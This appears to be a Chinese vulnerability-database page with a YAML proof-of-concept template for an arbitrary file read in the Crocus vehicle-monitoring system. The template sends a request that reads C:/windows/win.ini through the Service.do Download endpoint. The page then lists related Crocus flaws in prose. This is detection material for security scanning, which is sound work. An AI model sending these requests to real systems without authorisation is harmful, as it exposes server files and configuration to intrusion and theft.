crocus-service-do-fileread: 锐明技术Crocus系统存在任意文件读取

漏洞描述

PoC代码[已公开]

id: crocus-service-do-fileread

info:
  name: 锐明技术Crocus系统存在任意文件读取
  author: zan8in
  severity: high
  verified: true
  description: |-
    Crocus系统存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器敏感信息。
  tags: crocus,fileread
  created: 2025/02/14

rules:
  r0:
    request:
      method: GET
      path: /Service.do?Action=Download&Path=C:/windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
expression: r0()

相关漏洞推荐

• 锐明技术Crocus系统 DeviceFileReport.do 任意文件读取漏洞 无POC

  2025-08-12 | 锐明技术Crocus系统
  锐明技术Crocus系统DeviceFileReport.do接口存在任意文件读取漏洞，未经过身份验证的远程攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导...

• 锐明技术Crocus系统存在SQL注入漏洞 无POC

  2025-07-31 | 锐明技术Crocus系统
  锐明技术Crocus系统存在SQL注入漏洞，未经身份验证的远程攻击者可以获取数据库权限，读取敏感信息。

• 锐明技术Crocus系统 Common.do 存在SQL注入漏洞 无POC

  2024-08-23 | 锐明技术Crocus系统
  深圳市锐明技术股份有限公司锐明技术Crocus系统融合了锐明技术的多项核心技术，如视频图像处理技术、卫星定位、物联网传感器、车载电子工程及无线通讯等，旨在为用户提供系统化、智能化的商用车监控和信息化解...

• 锐明技术Crocus系统 Upload存在任意文件上传漏洞 无POC

  2025-08-07 | Crocus系统Upload
  锐明技术Crocus系统的Upload功能存在任意文件上传漏洞，由于未对上传文件的类型、内容及路径进行严格校验，攻击者可上传恶意文件至服务器，结合路径拼接缺陷实现目录穿越，最终可能导致远程代码执行（R...

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...